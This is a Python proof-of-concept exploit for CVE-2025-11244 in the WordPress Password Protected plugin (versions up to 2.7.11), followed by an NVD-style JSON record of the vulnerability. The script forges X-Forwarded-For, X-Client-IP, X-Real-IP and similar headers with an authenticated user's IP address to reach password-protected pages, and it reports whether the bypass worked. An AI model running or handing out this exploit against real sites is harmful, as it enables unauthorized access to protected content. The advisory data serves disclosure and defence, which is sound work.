CVE-2025-11244

# CVE-2025-11244 PoC - IP Spoofing Authorization Bypass # Affected: WordPress Password Protected Plugin <= 2.7.11 # Condition: 'Use transients' option must be enabled import requests import sys TARGET_URL = "http://target-wordpress-site.com/" LEGITIMATE_USER_IP = "192.168.1.100" # IP of a legitimately authenticated user PROTECTED_PAGE = "http://target-wordpress-site.com/protected-page/" def exploit_ip_spoofing(): """ Exploit the IP spoofing vulnerability in Password Protected plugin. The plugin trusts X-Forwarded-For header to determine user IP address. """ headers = { # Spoof the IP address of a legitimate authenticated user 'X-Forwarded-For': LEGITIMATE_USER_IP, 'X-Client-IP': LEGITIMATE_USER_IP, 'HTTP_CLIENT_IP': LEGITIMATE_USER_IP, 'X-Real-IP': LEGITIMATE_USER_IP, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } print(f"[*] Target: {TARGET_URL}") print(f"[*] Spoofing IP: {LEGITIMATE_USER_IP}") print(f"[*] Sending request with spoofed headers...") try: # First request - attempt to bypass protection response = requests.get(PROTECTED_PAGE, headers=headers, timeout=10) if response.status_code == 200: # Check if we got access to protected content if 'password' not in response.text.lower() or 'protected' not in response.text.lower(): print("[+] SUCCESS: Authorization bypass achieved!") print(f"[+] Accessed protected content without password") return True print("[-] Failed to bypass authorization") print("[*] Possible reasons:") print(" - 'Use transients' option is not enabled") print(" - Site is behind a CDN/reverse proxy that overwrites headers") print(" - Incorrect target IP address") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-11244 - Password Protected Plugin IP Spoofing PoC") print("=" * 60) exploit_ip_spoofing()

{"cve": {"id": "CVE-2025-11244", "sourceIdentifier": "[email protected]", "published": "2025-10-25T06:15:34.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Password Protected plugin for WordPress is vulnerable to authorization bypass via IP address spoofing in all versions up to, and including, 2.7.11. This is due to the plugin trusting client-controlled HTTP headers (such as X-Forwarded-For, HTTP_CLIENT_IP, and similar headers) to determine user IP addresses in the `pp_get_ip_address()` function when the \"Use transients\" feature is enabled. This makes it possible for attackers to bypass authorization by spoofing these headers with the IP address of a legitimately authenticated user, granted the \"Use transients\" option is enabled (non-default configuration) and the site is not behind a CDN or reverse proxy that overwrites these headers."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/password-protected/tags/2.7.11/includes/transient-functions.php#L33", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-11244/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/30b4371d-54a2-4111-ad2c-b38b6b31884d?source=cve", "source": "[email protected]"}]}}